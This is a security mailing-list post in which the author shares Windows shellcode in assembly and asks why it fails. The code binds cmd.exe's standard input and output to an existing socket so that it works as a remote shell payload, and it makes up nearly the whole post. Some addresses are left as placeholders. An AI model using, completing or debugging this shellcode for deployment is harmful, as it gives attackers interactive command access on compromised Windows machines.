Re: Windows reverse Shell

[Berend-Jan Wever <skylined () edup tudelft nl>]

In-Reply-To: <00ef01c2cc6c$7fb7a030$a7db5cdb@sk4n>

I wrote a little piece of shellcode that should spawn a shell using a 
socket in %ebp, which will execute cmd.exe succesfully. The problem is 
that cmd.exe dies right away. Has anybody got an idear why ? The source 
(asm for linux) is included.

Kind regards,

Berend-Jan Wever

    Start:
    MakeStringAndNegEbx:
      mov     $',', %al
      xor     %ecx, %ecx
      dec     %ecx
      repne   scasb             # search for ','
      sub     %al, -1(%edi)
      neg     %ebx
      ret
    
    GetLibraryAndProcAddress: # {
      push    %edi              # > libName
      mov     $-0xXXXXXX, %ebx  #
      call    MakeStringAndNegEbx # put 0 after libName
      call    *(%ebx)           # < LoadLibraryA(libName);

      push    %edi              # > procName
      push    %eax              #  > libHandle
      mov     $-0xXXXXXX, %ebx  #
      call    MakeStringAndNegEbx # put 0 after ProcName
      call    *(%ebx)           # << GetProcAddress(libHandle, procName);
      ret
    # }

    main1:
      # %ebp = socket
      pop     %edi              # < %edi = &strings
      
      # create a struct StartupInfo on the stack.
      xor     %eax, %eax
      push    %ebp              # HANDLE hStdError = socket
      push    %ebp              # HANDLE hStdOutput = socket
      push    %ebp              # HANDLE hStdInPut = socket
      push    %eax              # LPBYTE lpReserved2 = NULL
      inc     %eax              # WORD   cbReserved2 = 0;
      push    %eax              # WORD   wShowWindow = 1;
      mov     %al, %ah          # 0x101
      push    %eax              # DWORD  dwFlags = STARTF_USESHOWWINDOW |
      xor     %eax, %eax        #                  STARTF_USESTDHANDLES
      push    %eax              # DWORD  dwFillAttribute = 0
      push    %eax              # DWORD  dwYCountChars = 0
      push    %eax              # DWORD  dwXCountChars = 0
      push    %eax              # DWORD  dwYSize = 0
      push    %eax              # DWORD  dwXSize = 0
      push    %eax              # DWORD  dwY = 0
      push    %eax              # DWORD  dwX = 0
      push    %eax              # LPTSTR lpTitle = NULL (program name)
      push    %eax              # LPTSTR lpDesktop = NULL (inherit)
      push    %eax              # LPTSTR lpReserved = NULL
      mov     $0x44, %al
      push    %eax              # DWORD  cb = 0x44 (length);
      mov     %esp, %esi

      # create a struct ProcessInformation on the stack.
      xor     %eax, %eax
      push    %eax              # HANDLE hProcess;
      push    %eax              # HANDLE hThread;
      push    %eax              # DWORD dwProcessId;
      push    %eax              # DWORD dwThreadId;


      # create a process with STD I/O handles hooked to socket.
      push    %esp              # > lpProcessInformation -> stack
      push    %esi              #  > lpStartupInfo -> stack
      push    %eax              #   > lpCurrentDirecty: NULL 
      push    %eax              #    > lpEnvironment: NULL
      push    %eax              #     > dwCreationFlags: 0
      inc     %eax
      push    %eax              #      > bInheritHandles: 1 (true)
      dec     %eax
      push    %eax              #       > lpThreadAttributes: NULL
      push    %eax              #        > lpProcessAttributes: NULL
      push    %edi              #         > lpCommandLine: &('cmd.exe')
      push    %eax              #          > lpApplicationName: NULL
      call    MakeStringAndNegEbx # put 0 after commandline
      call    GetLibraryAndProcAddress # LoadLibrary and GetProcAddress
      call    *%eax             # <<<<<<<<<< CreateProcess(...);
      
    InfinitLoop:
      jmp     InfinitLoop       # wait forever.

    EntryPoint:
      lea   0xXX(%esp), %eax    # socket is on the stack at XX
      mov   (%eax), %ebp        # socket
      call  main1
    End:

The code is followed by this string:
    "cmd.exe,kernel32.dll,CreateProcessA,"